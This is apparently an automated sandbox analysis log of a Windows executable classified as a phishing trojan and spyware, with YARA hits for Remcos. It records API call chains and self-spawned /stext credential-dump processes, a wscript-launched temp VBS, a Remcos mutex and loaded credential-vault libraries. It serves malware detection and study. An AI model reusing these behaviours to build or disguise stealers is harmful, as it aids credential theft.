              Source: Yara matchFile source: 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4458828741.00000000069BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3652191797.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4458828741.00000000069A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: LrBF2Z930N.exe PID: 516, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00401806 NtdllDefWindowProc_W,5_2_00401806
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_004018C0 NtdllDefWindowProc_W,5_2_004018C0
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004016FD NtdllDefWindowProc_A,6_2_004016FD
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004017B7 NtdllDefWindowProc_A,6_2_004017B7
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00402CAC NtdllDefWindowProc_A,7_2_00402CAC
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00402D66 NtdllDefWindowProc_A,7_2_00402D66
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00406DA00_2_00406DA0
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_6E391BFF0_2_6E391BFF
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_378771944_2_37877194
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_3786B5C14_2_3786B5C1
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044B0405_2_0044B040
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0043610D5_2_0043610D
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_004473105_2_00447310
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044A4905_2_0044A490
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0040755A5_2_0040755A
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0043C5605_2_0043C560
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044B6105_2_0044B610
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044D6C05_2_0044D6C0
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_004476F05_2_004476F0
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044B8705_2_0044B870
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044081D5_2_0044081D
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_004149575_2_00414957
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_004079EE5_2_004079EE
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00407AEB5_2_00407AEB
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044AA805_2_0044AA80
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00412AA95_2_00412AA9
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00404B745_2_00404B74
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00404B035_2_00404B03
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044BBD85_2_0044BBD8
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00404BE55_2_00404BE5
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00404C765_2_00404C76
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00415CFE5_2_00415CFE
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00416D725_2_00416D72
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00446D305_2_00446D30
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00446D8B5_2_00446D8B
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00406E8F5_2_00406E8F
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004050386_2_00405038
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0041208C6_2_0041208C
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004050A96_2_004050A9
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0040511A6_2_0040511A
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0043C13A6_2_0043C13A
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004051AB6_2_004051AB
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004493006_2_00449300
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0040D3226_2_0040D322
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0044A4F06_2_0044A4F0
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0043A5AB6_2_0043A5AB
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004136316_2_00413631
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004466906_2_00446690
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0044A7306_2_0044A730
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004398D86_2_004398D8
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004498E06_2_004498E0
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0044A8866_2_0044A886
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0043DA096_2_0043DA09
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00438D5E6_2_00438D5E
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00449ED06_2_00449ED0
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0041FE836_2_0041FE83
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00430F546_2_00430F54
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004050C27_2_004050C2
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004014AB7_2_004014AB
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004051337_2_00405133
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004051A47_2_004051A4
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004012467_2_00401246
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_0040CA467_2_0040CA46
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004052357_2_00405235
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004032C87_2_004032C8
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004222D97_2_004222D9
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004016897_2_00401689
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00402F607_2_00402F60
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: String function: 00416760 appears 69 times
              Source: LrBF2Z930N.exe, 00000004.00000002.4458828741.0000000006A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exe, 00000004.00000002.4458828741.0000000006A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exe, 00000004.00000003.3657134971.0000000006A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exe, 00000004.00000003.3686267728.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exe, 00000004.00000003.3687706334.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exe, 00000004.00000003.3652153611.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exe, 00000004.00000002.4484694485.000000003784B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exeBinary or memory string: OriginalFileName vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exeBinary or memory string: OriginalFilename vs LrBF2Z930N.exe
              Source: LrBF2Z930N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@11/14@4/3
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_004182CE
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,7_2_00410DE1
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AF2
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,5_2_00413D4C
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021AF
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,5_2_0040B58D
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile created: C:\Users\user\eftermodnendesJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile created: C:\Users\user\AppData\Local\Temp\nse8208.tmpJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs"
              Source: LrBF2Z930N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: LrBF2Z930N.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: LrBF2Z930N.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: LrBF2Z930N.exe, 00000004.00000002.4484314987.0000000037740000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: LrBF2Z930N.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: LrBF2Z930N.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: LrBF2Z930N.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: LrBF2Z930N.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: LrBF2Z930N.exeVirustotal: Detection: 34%
              Source: LrBF2Z930N.exeReversingLabs: Detection: 26%
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile read: C:\Users\user\Desktop\LrBF2Z930N.exeJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_6-33208
              Source: unknownProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe "C:\Users\user\Desktop\LrBF2Z930N.exe"
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe "C:\Users\user\Desktop\LrBF2Z930N.exe"
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\rldkxktiiyi"
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\tgicxdejwgafity"
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\einnyvodjoskszmffx"
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs"
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe "C:\Users\user\Desktop\LrBF2Z930N.exe"Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\rldkxktiiyi"Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\tgicxdejwgafity"Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\einnyvodjoskszmffx"Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
